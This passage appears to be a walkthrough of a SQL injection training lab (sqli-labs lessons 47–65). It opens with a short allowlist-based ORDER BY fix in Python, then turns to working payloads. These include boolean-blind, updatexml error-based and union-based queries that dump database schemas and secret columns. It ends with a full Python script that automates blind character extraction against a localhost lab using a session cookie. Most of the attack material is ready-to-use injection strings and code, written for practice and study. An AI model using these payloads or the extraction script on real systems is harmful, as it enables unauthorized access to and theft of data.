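# Request value -> real column name. Anything not listed is rejected.
ALLOWED_SORT = {"id": "id", "username": "username"}
ALLOWED_DIR = {"asc": "ASC", "desc": "DESC"}


def build_order_by(sort, direction="asc"):
    """Return a fixed ORDER BY clause for allowlisted input, or raise ValueError."""
    col = ALLOWED_SORT.get(str(sort).strip().lower())
    dirn = ALLOWED_DIR.get(str(direction).strip().lower())
    if col is None or dirn is None:
        raise ValueError(f"unsupported sort parameter: {sort!r} {direction!r}")
    return f"ORDER BY {col} {dirn}"


def demo_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    con.executemany("INSERT INTO users (username) VALUES (?)",
                    [("Dumb",), ("Angelina",), ("Dummy",)])
    return con


def list_users(con, sort, direction="asc"):
    """The clause is built from allowlisted names only, so concatenating it is safe."""
    sql = "SELECT id, username FROM users " + build_order_by(sort, direction)
    return [row[1] for row in con.execute(sql)]


if __name__ == "__main__":
    con = demo_db()
    print(list_users(con, "id"))                 # ['Dumb', 'Angelina', 'Dummy']
    print(list_users(con, "username", "desc"))   # ['Dummy', 'Dumb', 'Angelina']
    try:
        build_order_by("1 || updatexml(1,concat(0x7e,database(),0x7e),1)")
    except ValueError as e:
        print("rejected:", e)
```

Mapping through a dictionary, rather than checking the input against a regex and then interpolating it, is the point: the string that reaches the statement is always one the code itself wrote. The same shape works for a numeric sort index (`?sort=1`) by mapping the number onto a column name instead of passing it through.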

Less-47 ORDER BY

Same as the lesson above (Less-47)

Less-48 ORDER BY Blind

?sort=if (1=1,1,(select 1 union select 2)) response shown
?sort=if (1=2,1,(select 1 union select 2)) no response

blind bool

Less-49 ORDER BY Blind

?sort=2' and if(1=1,1,(select 1 union select 2))%23 response shown
?sort=2' and if(1=2,1,(select 1 union select 2))%23 no response

blind bool

Less-50 ORDER BY

?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

error based

Less-51 ORDER BY

?sort=' || updatexml(1,concat(0x7e,database(),0x7e),1)%23

error based

Less-52 ORDER BY

Same as Less-48

Less-53 ORDER BY

Same as Less-49

Less-54 Challenge-1

?id=1

?id=1"

?id=1' %23

?id=1' order by 3 %23

?id=1' order by 4 %23

?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23

?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23

?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='P3KMPMWT2P' %23

?id=-1' union select id,secret_7HNV,concat(sessid,':',tryy) from challenges.P3KMPMWT2P %23

Less-55 Challenge-2

?id=1

?id=1'%23

?id=1"%23

?id=2-1

?id=-1 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1) union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1) union select 1,1,group_concat(column_name) from information_schema.columns where table_name='INEAJ9ROW1' %23

?id=-1' union select id,secret_YE4X,concat(sessid,':',tryy) from challenges.INEAJ9ROW1 %23

Less-56 Challenge-3

?id=1

?id=1'%23

?id=1"%23

?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1') union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1') union select 1,1,group_concat(column_name) from information_schema.columns where table_name='XB1AMCG87R' %23

?id=-1') union select id,secret_2YG9,concat(sessid,':',tryy) from challenges.XB1AMCG87R %23

Less-57 Challenge-4

?id=1

?id=1'%23

?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1" union select 1,1,group_concat(column_name) from information_schema.columns where table_name='ZLFUJA075M' %23

?id=-1" union select id,secret_PXK5,concat(sessid,':',tryy) from challenges.ZLFUJA075M %23

Less-58 Challenge-5

?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='W7PLNH9DHZ'),0x7e),1) %23

?id=-1' and updatexml(1,concat(0x7e,(select secret_O572 from challenges.W7PLNH9DHZ),0x7e),1) %23

Less-59 Challenge-6

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id='"

?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MJ77P2XKIV'),0x7e),1) %23

?id=-1 and updatexml(1,concat(0x7e,(select secret_C8VM from challenges.MJ77P2XKIV),0x7e),1) %23

Less-60 Challenge-7

?id='"

?id=-1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='V97YZ9KR3X'),0x7e),1) %23

?id=-1") and updatexml(1,concat(0x7e,(select secret_80IV from challenges.V97YZ9KR3X),0x7e),1) %23

Less-61 Challenge-8

?id='"

?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23

?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='FJIXLCJP1F'),0x7e),1) %23

?id=-1')) and updatexml(1,concat(0x7e,(select secret_4MGK from challenges.FJIXLCJP1F),0x7e),1) %23

Less-62 Challenge-9

?id=1
?id=1 and 1=2 %23
?id=1' and 1=2 %23
?id=1') and 1=2 %23
?id=1') and 1=1 %23 confirms blind bool and the closing
    # 83 requests
    from urllib.parse import quote

    import requests
    from lxml import etree

    url = "http://localhost:9090/Less-62/?id={}"
    headers = {
        "Host": "localhost:9090",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "keep-alive",
        "Cookie": "challenge=2b720b5359202de2d62768369718f694",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
    }

    names = []


    def req(sql):
        # Use the subquery's value as the row id; the page echoes that row's
        # login name, which names.index() maps back to a number (1-based).
        p = quote("-1') or id = ({}) #".format(sql))
        u = url.format(p)
        print(u)
        res = requests.post(u, headers=headers)
        html = etree.HTML(res.text)
        txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
        if len(txt) != 0:
            name = str(txt[0]).replace("Your Login name :", "")
            return names.index(name) + 1
        return -1


    def find_names():
        # Collect the login names for id 1.. so a returned name maps to its id.
        for i in range(1, 15):
            res = requests.get(url.format(i), headers=headers)
            html = etree.HTML(res.text)
            txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
            print(txt)
            if len(txt) != 0:
                names.append(str(txt[0]).replace("Your Login name :", ""))
            else:
                break
        print(names)


    def find_number(m1, m2):
        # Recover n in 0..109 from n mod 10 and n mod 11 (Chinese remainder
        # theorem), so each character costs two requests instead of a search.
        for i in range(11):
            n1 = 10 * i + m1
            for j in range(10):
                n2 = 11 * j + m2
                if n1 == n2:
                    return n2


    def tables():
        table_name = ""
        sql1 = "select mod(n,10)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
               "information_schema.tables where table_schema='challenges')t"
        sql2 = "select mod(n,11)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
               "information_schema.tables where table_schema='challenges')t"

        for i in range(1, 100):
            m1 = req(sql1.format(i))
            if m1 == -1:
                break
            m2 = req(sql2.format(i))
            if m2 == -1:
                break
            asc = find_number(m1 - 1, m2 - 1) + 47
            table_name += chr(asc)
        return table_name


    def dump(table_name):
        value = ""
        sql1 = "select mod(n,10)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
               "4 as d union select * from challenges.{} limit 1,1)t)tt"
        sql2 = "select mod(n,11)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
               "4 as d union select * from challenges.{} limit 1,1)t)tt"

        for i in range(1, 100):
            m1 = req(sql1.format(i, table_name))
            if m1 == -1:
                break
            m2 = req(sql2.format(i, table_name))
            if m2 == -1:
                break
            asc = find_number(m1 - 1, m2 - 1) + 47
            value += chr(asc)
        return value


    def main():
        find_names()
        table_name = tables()
        value = dump(table_name)
        print(value)


    if __name__ == '__main__':
        main()

Less-63 Challenge-10

Same as Less-62 above, closing with a single quote '

Less-64 Challenge-11

Same as Less-62 above, closing with double parentheses ))

Less-65 Challenge-12

Same as Less-62 above, closing with a double quote plus parenthesis ")
